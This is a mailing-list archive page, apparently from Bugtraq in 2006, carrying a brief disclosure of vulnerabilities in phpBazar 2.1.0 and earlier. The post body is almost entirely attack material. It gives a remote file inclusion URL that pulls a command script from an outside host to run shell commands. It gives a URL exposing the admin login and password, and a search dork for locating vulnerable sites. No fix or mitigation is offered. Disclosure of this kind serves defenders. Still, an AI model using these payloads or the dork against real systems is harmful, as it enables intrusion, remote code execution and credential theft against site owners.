[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

phpBazar <= 2.1.0 Multiple vulnerabilites

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: phpBazar <= 2.1.0 Multiple vulnerabilites
From: i6d@xxxxxxxxxxx
Date: 20 May 2006 12:06:35 -0000

Title: phpBazar <= 2.1.0 Multiple vulnerabilites
URL: http://www.smartisoft.com/
Dork: inurl:classified.php phpbazar

Exploits:
-remote file inclusion: 
/classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls
-access to admin login and password: /admin/admin.php?action=edit_member&value=1

# Found By PHP Emperor

Prev by Date: [SECURITY] [DSA 1066-1] New phpbb2 packages fix execution of arbitrary web script code
Next by Date: Re: [Full-disclosure] RealVNC 4.1.1 Remote Compromise
Previous by thread: [SECURITY] [DSA 1066-1] New phpbb2 packages fix execution of arbitrary web script code
Next by thread: Re: NSA Group Security Advisory NSAG-195-23.02.2006 Vulnerability FCKeditor 2.0 FC
Index(es):
- Date
- Thread